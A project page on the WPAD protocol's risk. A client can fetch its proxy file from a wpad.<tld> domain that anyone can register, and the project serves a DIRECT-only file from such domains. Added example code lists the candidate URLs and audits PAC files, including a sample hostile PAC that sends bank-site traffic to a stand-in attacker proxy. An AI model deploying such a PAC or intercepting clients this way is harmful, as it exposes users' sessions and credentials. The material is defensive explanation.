The project that keeps you safe on the internet, without you knowing it!
The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.
Before fetching its first page, a web browser implementing this method sends a DHCPINFORM query to the local DHCP server and uses the URL from the WPAD option (DHCP option 252) in the server's reply. If the DHCP server does not provide that information, DNS is used instead. If, for example, the network name of the user's computer is laptop1.department.branch.company.onl, the browser will try the following URLs in turn until it finds a proxy configuration file within the domain of the client:
- Try http://wpad.department.branch.company.onl/wpad.dat
- Try http://wpad.branch.company.onl/wpad.dat
- Try http://wpad.company.onl/wpad.dat
- Try http://wpad.onl/wpad.dat
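The candidate list above can be generated mechanically by stripping one label at a time from the client's hostname. The following is an added example (not code from the WPAD project or THUGSred's own) that does exactly that, with a switch showing the difference between a client that stops before the top-level domain and a naive one that goes all the way down to wpad.<tld>. The hostname is the one from the text; a real client should additionally consult the Public Suffix List, since a multi-label public suffix such as co.uk makes wpad.co.uk just as registrable as wpad.onl.

```javascript
// Added example (not part of the WPAD project page or THUGSred's code).
// Builds the list of wpad.dat URLs that DNS-based WPAD discovery tries for a
// client hostname by dropping one label at a time. The first label is the
// host's own name and is never used. The final, TLD-only candidate
// (http://wpad.onl/wpad.dat) is the lookup the page warns about.

function wpadCandidateUrls(hostname, stopBeforeTld = true) {
  const labels = hostname.toLowerCase().replace(/\.$/, "").split(".");
  const urls = [];
  // A careful client keeps at least two labels (never wpad.<tld>);
  // a naive client keeps going until only the TLD is left.
  const minLabels = stopBeforeTld ? 2 : 1;
  // Start at index 1 to drop the host's own label ("laptop1").
  for (let i = 1; labels.length - i >= minLabels; i++) {
    urls.push(`http://wpad.${labels.slice(i).join(".")}/wpad.dat`);
  }
  return urls;
}

// Flags candidates a client should never request: "wpad." followed by a
// single label, i.e. a public TLD under which anyone can register "wpad".
function riskyCandidates(urls) {
  return urls.filter(u => /^http:\/\/wpad\.[^./]+\/wpad\.dat$/.test(u));
}

// Run stand-alone to print both lists for the page's example hostname.
const exampleHost = "laptop1.department.branch.company.onl";
console.log("naive client:", wpadCandidateUrls(exampleHost, false));
console.log("risky:", riskyCandidates(wpadCandidateUrls(exampleHost, false)));
console.log("careful client:", wpadCandidateUrls(exampleHost));
```

The naive walk produces the four URLs listed in the text and riskyCandidates() singles out the last one; the careful walk stops at wpad.company.onl, which is still inside a domain the organisation controls.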
As you can see, the last check poses a major security risk: a client that walks all the way down to the top-level domain asks wpad.onl for its proxy configuration, and anyone can potentially register the wpad.onl domain and serve whatever file they like there.
I used that example because THUGSred owns wpad.onl.
Check out the wpad.dat file content here
The security risk?
The main security risk is that a threat actor ends up in control of your "automatic proxy detection" wpad.dat settings.
From there they can tell your computer/software to send its traffic through a proxy server under the threat actor's control, all without you ever knowing it.
The possibilities from that point are almost endless and potentially very bad.
Here are a few of the threats and attacks that can be applied to traffic that flows through a proxy the attacker controls:
- Website spoofing (phishing)
- Stealing sessions/cookies
- Stealing form fields
- Traffic inspection (plain HTTP is fully readable; for HTTPS the proxy still sees which hosts you connect to via CONNECT, and sees the content only if it can get your client to trust a certificate it controls)
- Malicious payloads/downloads
What we do ...
Whenever your computer/software makes the mistake of trying to fetch the "automatic proxy detection" wpad.dat file from a TLD-level wpad domain we control (whatever the TLD, as long as wpad.<tld> is ours), we send back a clean wpad.dat file. That file tells it to do no proxying at all.
(Simply put, we are sending back a DIRECT command.)
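A wpad.dat file is a PAC file: JavaScript that the client calls as FindProxyForURL(url, host) for every request, and "DIRECT" means "connect without a proxy". The following is an added example (not the project's actual wpad.dat, which is linked from the page) that contrasts a clean DIRECT-only file with a constructed hostile one, and includes a small offline audit routine you can point at whatever wpad.dat your own machine fetched to see whether any request would leave via a proxy. The proxy host proxy.attacker.example and the sample URLs are made up for the example.

```javascript
// Added example (not part of the WPAD project page or THUGSred's code).
// Constructed sample: a clean wpad.dat of the kind the page describes.
const CLEAN_PAC = `
function FindProxyForURL(url, host) {
  return "DIRECT";
}
`;

// Constructed sample: a hostile wpad.dat. Only traffic for one domain is
// diverted, so casual browsing looks normal. The proxy host is made up.
const HOSTILE_PAC = `
function FindProxyForURL(url, host) {
  if (dnsDomainIs(host, ".bank.example")) {
    return "PROXY proxy.attacker.example:8080; DIRECT";
  }
  return "DIRECT";
}
`;

// Minimal stand-ins for helpers the browser's PAC runtime normally provides.
const pacHelpers = {
  dnsDomainIs: (host, domain) => host.endsWith(domain),
  isPlainHostName: (host) => !host.includes("."),
  shExpMatch: (str, pattern) =>
    new RegExp("^" + pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&")
      .replace(/\*/g, ".*").replace(/\?/g, ".") + "$").test(str),
};

// Compile PAC source and return its FindProxyForURL. new Function is used
// because this is an offline audit of a file you already hold; never evaluate
// an untrusted PAC inside a privileged context.
function loadPac(source) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, source + "\nreturn FindProxyForURL;");
  return factory(...names.map(n => pacHelpers[n]));
}

// Returns [{url, result}] for every URL whose proxy string is not plain DIRECT.
function auditPac(source, urls) {
  const findProxy = loadPac(source);
  const findings = [];
  for (const url of urls) {
    const host = new URL(url).hostname;
    const result = String(findProxy(url, host));
    if (result.trim().toUpperCase() !== "DIRECT") findings.push({ url, result });
  }
  return findings;
}

// Constructed sample URLs to probe with.
const SAMPLE_URLS = [
  "https://login.bank.example/",
  "http://intranet/",
  "https://www.example.com/",
];

console.log("clean:", auditPac(CLEAN_PAC, SAMPLE_URLS));     // []
console.log("hostile:", auditPac(HOSTILE_PAC, SAMPLE_URLS)); // one finding
```

The clean file yields no findings for any URL; the hostile file reports only the banking URL, which is the point of probing with a list of hostnames you actually care about rather than a single test request.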
In the future we might test sending clients to a local proxy so we can collect more statistical data for security research, such as which website hostname/domain you were trying to visit. This is not live for now. It would also require us to "interrupt" all your traffic by relaying back an error saying "you can't view this page", which most people would not welcome and which could disrupt systems and software.